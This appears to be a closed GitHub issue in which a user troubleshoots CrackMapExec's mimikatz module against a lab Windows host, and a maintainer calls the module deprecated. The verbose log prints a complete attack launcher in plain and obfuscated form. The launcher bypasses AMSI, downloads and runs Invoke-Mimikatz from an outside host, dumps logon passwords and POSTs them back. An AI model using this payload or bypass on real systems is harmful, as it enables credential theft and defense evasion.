Closed ymgh96 closed 2 years ago
Hello I try to run mimikatz module with crackmapexec but it stuck after GET request and never get the POST request. Where am I wrong?
crackmapexec --verbose smb 192.168.150.90 -u bob -p XXXX -d lab -M mimikatz --server-port 8080 --server http
DEBUG Passed args: {'aesKey': None, 'amsi_bypass': None, 'clear_obfscripts': False, 'content': False, 'continue_on_success': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': 'lab', 'exclude_dirs': '', 'exec_method': None, 'execute': None, 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'get_file': None, 'gfail_limit': None, 'groups': None, 'hash': [], 'jitter': None, 'kdcHost': None, 'kerberos': False, 'list_modules': False, 'local_auth': False, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': 'mimikatz', 'module_options': [], 'no_bruteforce': False, 'no_output': False, 'ntds': None, 'obfs': False, 'only_files': False, 'pass_pol': False, 'password': ['XXXX'], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'put_file': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'http', 'server_host': '0.0.0.0', 'server_port': 8080, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'smb_server_port': 445, 'spider': None, 'spider_folder': '.', 'target': ['192.168.150.90'], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['bob'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\\cimv2'} DEBUG CME server type: http DEBUG Using selector: EpollSelector DEBUG Running DEBUG Started thread poller DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104) DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104) SMB 192.168.150.90 445 PC90 [*] Windows 10.0 Build 19041 x64 (name:PC90) (domain:lab) (signing:False) (SMBv1:False) DEBUG add_credential(credtype=plaintext, domain=LAB, username=bob, password=XXXX, groupid=None, pillaged_from=None) => None SMB 192.168.150.90 445 PC90 [+] lab\bob:XXXX (Pwn3d!) DEBUG Generated PS IEX Launcher: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse() DEBUG Generated PS command: [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} try{ [Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true) }catch{} [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12' IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1') $cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit' $request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/') $request.Method = 'POST' $request.ContentType = 'application/x-www-form-urlencoded' $bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd) $request.ContentLength = $bytes.Length $requestStream = $request.GetRequestStream() $requestStream.Write($bytes, 0, $bytes.Length) $requestStream.Close() $request.GetResponse() DEBUG Target system is 192.168.150.90 and isFDQN is False DEBUG StringBinding: pc90[65356] DEBUG StringBinding: 172.16.70.30[65356] DEBUG StringBinding: 192.168.150.90[65356] DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.150.90[65356] DEBUG Executed command via wmiexec DEBUG Executing command: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " INVOKe-eXpressION (-jOiN ('91&78r101j116j46{83~101z114r118{105f99j101B80~111~105{110~116j77{97f110S97{103B101S114&93{58f58S83~101S114r118f101B114B67{101j114S116{105B102&105r99r97&116j101{86z97j108j105{100S97j116f105r111~110r67f97&108{108f98j97&99j107f32&61j32{123~36j116{114z117&101r125{10B116&114S121B123f10r91{82{101j102B93f46B65r115j115~101&109&98&108~121r46z71&101j116S84{121{112&101{40B39S83&121S115S39&43f39z116f101S109j46&77f97S110j39{43j39z97{103{101S109{101S110S116j46{65z117{116{39f43&39{111~109r97&116f105f111{110&46{65S109j39S43j39S115&105B85S116j39S43&39B105f108B115B39~41j46{71{101r116f70&105j101z108~100&40~39r97B109~39{43&39f115r105~73j110B105z39f43f39~116{70B97{105f108B101r100r39z44{32{39&78{111j110B80r39r43j39z117{98j108j105B99S44S83B116S97S39{43B39z116~105{99{39{41B46{83S101f116z86B97&108B117{101r40j36B110z117f108S108j44z32f36r116B114&117f101z41{10~125~99S97S116&99f104~123~125&10~91z78r101r116j46B83j101r114B118r105r99z101{80&111S105B110f116S77B97&110B97z103B101S114{93j58S58j83{101{114r118{101r114r67{101j114z116z105&102~105f99f97{116S101f86S97{108{105j100j97r116B105z111B110r67~97j108z108S98z97{99B107&32r61&32~123j36&116S114~117r101r125r10&91B83S121{115r116r101z109r46z78~101{116~46&83&101j114B118j105S99S101S80r111z105&110r116&77{97z110~97z103z101f114j93j58{58&83{101{99B117&114j105~116r121B80~114z111~116{111S99S111&108f32r61{32B91j83z121j115j116S101r109f46&78S101&116z46r83j101{99&117~114S105S116f121B80&114z111z116&111B99S111{108f84{121{112r101j93B39r83~115~108&51~44~84~108j115f44S84B108&115{49z49{44{84r108r115r49r50{39S10~73r69&88f32f40{78{101&119z45{79S98r106{101~99j116z32B78~101B116~46~87B101{98S67~108f105j101{110&116f41r46f68j111{119f110{108{111~97&100{83r116z114S105z110B103~40~39f104S116f116r112r58f47S47r49{57j50z46f49S54{56B46B49B53{48&46z50r58f56&48~56{48S47r73S110f118r111r107z101z45&77{105f109z105S107j97{116f122S46B112j115~49B39z41z10j36&99{109z100r32&61&32B73z110{118j111j107j101j45{77&105f109&105S107f97j116S122~32{45z67S111z109~109{97z110~100z32{39z112S114S105&118~105~108S101{103B101f58{58z100j101&98z117{103S32&115~101f107z117r114&108{115f97j58~58{108{111&103j111r110z112~97z115f115j119&111j114{100f115r32S101{120f105z116z39f10{36~114{101f113z117j101r115B116S32B61&32&91f83&121B115f116~101r109~46j78{101f116&46B87S101~98f82z101r113r117~101~115&116S93z58S58~67r114f101&97B116{101S40~39B104r116&116r112B58{47S47z49&57S50{46&49&54z56r46z49r53~48j46{50j58S56&48r56{48B47z39{41r10&36&114&101{113~117B101{115S116{46r77z101f116{104{111~100S32r61~32r39r80j79f83{84B39&10{36j114j101r113B117j101&115~116B46z67B111z110j116{101{110{116&84j121B112S101z32{61f32j39{97&112~112&108{105z99r97z116&105j111j110S47B120z45j119~119r119r45S102{111r114~109{45j117&114f108j101f110&99{111~100r101r100z39{10B36f98S121B116~101r115{32r61~32f91r83{121r115~116~101~109B46{84&101&120z116z46{69B110B99S111B100f105f110r103~93z58B58f65B83&67r73z73j46z71r101{116{66f121S116~101f115r40&36{99j109S100S41B10j36z114f101r113{117~101z115{116B46{67{111z110{116j101z110S116f76&101f110z103j116B104r32{61&32B36j98S121~116B101r115{46{76j101{110B103j116r104{10j36{114z101~113r117r101{115{116{83f116{114f101~97r109z32f61r32{36z114&101z113B117S101{115z116S46j71B101~116j82{101f113j117B101&115&116B83~116z114B101r97z109~40B41S10z36~114{101{113{117~101z115B116S83&116r114B101j97f109{46j87j114~105j116j101z40B36S98{121f116{101r115z44r32r48f44{32r36r98{121j116B101r115{46~76B101{110S103r116S104&41z10f36j114r101{113&117z101r115{116{83{116r114j101j97B109~46S67{108~111B115{101j40f41{10z36z114f101f113&117f101S115{116j46S71{101B116j82z101{115r112{111B110r115{101r40S41'.sPLit('Bf&Sj~z{r{') |FoReAcH-ObjeCt { ( [ChAr] [inT] $_) }) )" MIMIKATZ 192.168.150.90 445 PC90 [+] Executed launcher DEBUG Stopped thread poller MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ 192.168.150.90 [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 - MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s) MIMIKATZ [*] Waiting on 1 host(s)
Version: 5.1.7dev Codename: U fancy huh?
Kali 2021.3 Linux 5.10.0-kali9-amd64
Windows 10 Version 21H1 (OS Build 19043.1288)
Mimikatz module is old and deprecated, try with lsassy module !
Detailed issue explanation
Hello I try to run mimikatz module with crackmapexec but it stuck after GET request and never get the POST request. Where am I wrong?
Steps to reproduce
Command string used
crackmapexec --verbose smb 192.168.150.90 -u bob -p XXXX -d lab -M mimikatz --server-port 8080 --server http
CME verbose output (using the --verbose flag)
CME Version (cme --version)
Version: 5.1.7dev Codename: U fancy huh?
OS
Kali 2021.3 Linux 5.10.0-kali9-amd64
Target OS
Windows 10 Version 21H1 (OS Build 19043.1288)